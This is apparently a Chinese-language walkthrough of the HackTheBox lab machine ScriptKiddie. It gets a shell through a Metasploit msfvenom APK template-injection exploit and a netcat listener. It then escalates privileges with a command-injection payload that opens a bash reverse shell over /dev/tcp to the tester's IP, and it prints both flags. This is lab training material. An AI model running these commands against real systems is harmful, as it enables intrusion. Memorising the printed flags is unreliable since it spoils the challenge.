0x01信息收集
端口扫描:namp -A -sS -sV -sC 10.10.10.226
开放了22和5000端口(开启了Werkzeug httpd 0.16.1服务),使用浏览器打开5000端口
是一个黑客工具集,类似于CTF中在线ping工具存在命令执行漏洞的一样,这时候就是开始漏洞搜索了。
0x02漏洞搜索且利用
Nmap设置127.0.0.1扫描一下,发现nmap的版本是7.80
Msf搜一下漏洞:
searchsploit -c Nmap发现并没有能利用的漏洞
搜索第二个工具,搜索venom时发现有个apk模板注入,我们可以利用这个试试看。(使用第三个在线工具也可以搜索venom)
这时候就可以利用msf生成一个apk的马
use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection //使用此exp发现只需要填写kali的IP地址和监听端口(4444)
set lhost 10.10.14.16 //设置本机IP地址exploit //生成木马
可知木马生成完毕,在/root/.msf4/local/路径下
然后开始监听4444端口
nc -lvvp 4444然后把生成的apk木马上传到第二个工具
然后getshell!我们升级一下shell
SHELL=/bin/bash script -q /dev/null
然后在根目录拿到user flag:
ec09611a1d4cf67b831700b176aa70bc
0x03提升权限
进入home目录,发现除了kid用户目录,还有一个pwn用户目录
查看pwn目录下的文件,发现有个scanlosers.sh的脚本文件,cat文件内容
通过脚本文件的代码审计,发现它会一直扫描/home/kid/logs/hackers日志文件的IP地址。
该脚本未对hackers文件传入的内容做过滤并且hackers文件是kid用户可编辑的,可以通过写入恶意代码,利用命令注入获得pwn用户的shell,在logs目录下输入:(记住有空格)
echo " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.16/1234 0>&1' #" hackers
1234端口成功反弹shell
Sudo -l 发现msf拥有root权限并且不需要密码
不多说,直接进入msf
sudo /opt/metasploit-framework-6.0.9/msfconsole
在root目录下,拿到root flag:
525a323ae46ff873d1a88e68fe6484a6
本文始发于微信公众号(暗魂攻防实验室):【渗透测试】hackthebox靶场之ScriptKiddie
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论